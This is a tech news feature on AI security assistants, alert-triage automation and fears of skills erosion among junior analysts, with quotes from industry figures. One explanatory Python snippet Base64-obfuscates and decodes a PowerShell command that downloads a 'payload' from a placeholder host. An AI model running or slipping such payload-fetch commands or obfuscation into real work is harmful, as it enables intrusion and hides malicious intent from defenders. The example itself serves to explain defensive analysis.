As AI seeps into every corner of the tech sector and beyond, a wave of security tools has flooded the market, promising to simplify cyber operations for businesses and professionals.
A key part of the value proposition vendors are making for AI security assistants is that companies can free up overstretched security teams by automating the most mundane and repetitive tasks in their workflows.
Many of the latest security assistants introduced by Microsoft, Cisco, Check Point and others can automate tasks that used to bog down workers, like organizing the overwhelming flow of alerts that security teams deal with every day.
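A rough sketch of the sort of triage these assistants automate might look like the following; the Alert shape, sample feed, and severity scale are invented for illustration, and real products layer correlation and enrichment on top of anything this simple:

```python
from collections import Counter
from dataclasses import dataclass

@dataclass(frozen=True)
class Alert:
    source: str    # producing system, e.g. "EDR" or "firewall" (invented labels)
    rule: str      # detection rule that fired
    severity: int  # 1 (informational) .. 5 (critical)

# Invented sample data standing in for a day's raw alert feed.
feed = [
    Alert("EDR", "suspicious-powershell", 4),
    Alert("firewall", "port-scan", 2),
    Alert("EDR", "suspicious-powershell", 4),
    Alert("EDR", "credential-dump", 5),
]

# Collapse duplicate (source, rule) pairs, then hand analysts a queue
# sorted by severity rather than by arrival order.
counts = Counter((a.source, a.rule) for a in feed)
unique = {(a.source, a.rule): a for a in feed}.values()
for a in sorted(unique, key=lambda a: a.severity, reverse=True):
    print(f"[sev {a.severity}] {a.source}/{a.rule} x{counts[(a.source, a.rule)]}")
```

Even this toy version shows why the task grates on analysts: it is pure repetition, and the human judgment only matters once the queue has been collapsed and ranked.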
Mandiant research in 2023 specifically highlighted "information overload" as a key barrier to effective threat intelligence. It's a problem plaguing security teams across the industry, the company said, contributing to staff burnout and poorer performance.
In theory, AI security tools should allow security personnel to focus on critical tasks that require human attention. Research from Censornet, for example, found that 49% of SMBs believe AI will improve their cyber defenses by freeing up security teams to proactively investigate risks.
After announcing that its Copilot for Security would be generally available from April 1, 2024, Microsoft said its assistant could perform documentation tasks, a common pain point for security teams, 46% faster than a human and with greater accuracy.
Another task that security professionals often get stuck on is manually reverse engineering obfuscated scripts. Attackers will obfuscate the scripts used in their attack chain to hide their methods and keep victims in the dark.
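To make the problem concrete, here is a minimal Python sketch of the simplest kind of obfuscation layer an analyst might peel back: a Base64-encoded command of the sort PowerShell accepts via -EncodedCommand. The command, URL, and filename are invented for illustration, and real attack chains typically stack several such layers:

```python
import base64

# A benign stand-in for an attacker's command; the URL and filename
# are invented for illustration.
command = "Invoke-WebRequest http://example.com/payload -OutFile p.ps1"

# Attackers commonly hide such commands behind a Base64 layer, here using
# the UTF-16-LE encoding PowerShell expects for -EncodedCommand, so the
# intent isn't obvious at a glance.
obfuscated = base64.b64encode(command.encode("utf-16-le")).decode("ascii")
print("What the analyst sees: ", obfuscated)

# Deobfuscation reverses the layer; real samples often add string
# reversal, XOR, or compression on top, which is where the manual
# reverse engineering effort piles up.
revealed = base64.b64decode(obfuscated).decode("utf-16-le")
print("What it actually runs:", revealed)
```

A single layer like this is trivial to undo, but each additional layer multiplies the manual effort, which is exactly the work vendors claim their assistants can shoulder.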
With the skills shortage plaguing the security industry, finding security personnel who have the knowledge and experience to manually decode these scripts is becoming an arduous task for companies.
Microsoft, naturally, said its tool would unlock huge productivity gains by allowing junior security analysts to reverse engineer such scripts without having to constantly consult senior colleagues.
No longer reliant on more knowledgeable senior colleagues, junior security staff will be able to use AI assistants to take on tasks that may previously have been above their skill level, but what does this really mean for their development?
If junior staff forgo the learning process with senior colleagues who might pass on useful tricks of the trade or spot knowledge gaps in new team members, will the skill levels of new cyber professionals suffer as a result of these new security co-pilots?
Speaking to ITPro, Jeff Watkins, director of product and technology at xDesign, said the benefits that AI adoption can bring to cybersecurity are clear, specifically in terms of automation.
“If there is one field that has huge potential for AI adoption, aside from the obvious customer support/CRM, it is cybersecurity,” he explained.
“From attack analysis and simulations to reverse engineering and adaptive countermeasures, there is great potential in the area to intelligently automate processes and content generation. In many ways, this is a good thing, given the size of most security teams, as even in a well-resourced organization there is typically one security professional for every 100 developers/technologists.”
But concerns about skills erosion are legitimate, Watkins said, citing the digital amnesia associated with 'The Google effect' and a worst-case scenario in which poorly trained cyber professionals are unable to tackle new, sophisticated attacks.
"There are a number of important factors in the adoption of AI in the context of cybersecurity, the first of which is analogous to 'The Google effect'. With too much AI assistance, there is a chance that security engineers will end up relying entirely on the AI assistant instead of learning how to solve problems themselves," he warned.
“This has the greatest potential for impact in an organization that uses AI tools rather than good mentoring and a match/follow approach.”
“The nightmare scenario is that cybersecurity allows itself to become de-skilled across organizations, meaning innovative new threats leave the team feeling powerless to solve problems and get out of the situation.”
AI is not a cyber "silver bullet," but it could actually help cyber skills
Chris Stouff, chief strategy officer at Armor Defense, told ITPro that it is important for companies to recognize the competencies and limitations of AI assistants, highlighting the continued importance of a robust, human-led security operations center (SOC).
"I think the portrayal of AI as a 'silver bullet' for cybersecurity is dangerous. While I agree that its use will be beneficial for things like automating repetitive security tasks, what worries me is the inference that AI, like some of the security products and services hailed before it, could become a standalone solution that will somehow override the requirement for an effective Security Operations Center (SOC)."
Stouff explained why AI is not the panacea that struggling security leaders might hope for: it lacks a human's situational awareness, judgment, and ability to prioritize tasks.
Mike Isbitski, director of cybersecurity strategy at security monitoring firm Sysdig, echoed this sentiment, warning against exaggerating the effect AI will have on skill levels among cyber professionals.
Isbitski noted that, in the long term, AI assistants could actually help junior team members improve their skills.
“Concerns about security teams becoming complacent about overusing AI to do their jobs are overblown,” he said.
"The rapid adoption of generative AI is similar to calculators and computers becoming ubiquitous in classrooms over the past few decades. It is inevitable, and generative AI is another powerful tool. The technology should be embraced, as it will allow young professionals to acquire skills more quickly and security programs to scale appropriately to mitigate advanced threats."